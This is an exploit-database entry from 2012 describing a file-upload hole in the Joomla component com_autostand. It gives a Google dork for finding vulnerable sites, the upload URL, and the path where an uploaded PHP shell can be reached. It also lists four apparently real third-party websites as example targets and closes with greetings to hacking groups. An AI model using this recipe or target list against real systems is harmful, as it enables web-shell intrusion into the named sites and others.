Joomla Component com_autostand shell upload Vulnerability

2012-11-14T00:00:00
ID 1337DAY-ID-19735
Type zdt
Reporter Over-X
Modified 2012-11-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title:  joomla com_autostand file upload
# Author: Over-X
# email: [email protected]
# Vendor or Software Link: forum.joomla.org
# Version: v3
# Google dork: "inurl:com_autostand"
# Tested on: win Xp
-------------------------------------------------------------------------------
poc:
----

localhost/path/index.php?option=com_autostand&func=newItem

upload shell php and go 2 :
--------------------------

localhost/path/images/autostand/images/shell.php

examples:

http://www.karahan.be//index.php?option=com_autostand&func=newItem
http://www.maxoverdrive.ca//index.php?option=com_autostand&func=newItem
http://www.dohenysupplies.com/index.php?option=com_autostand&func=newItem
http://vcmauto.com//index.php?option=com_autostand&func=newItem

---------------------------------------------------------------------------------------
Gre: Sec4ever.com & Damane2011 & Invectus & Kha&mix & 4chrf & ked Ans & Black_Specter & 

                 ms_dz & indoushka & jago-dz & L3b r1z & b0x & scorpion_tn

#  0day.today [2018-01-03]  #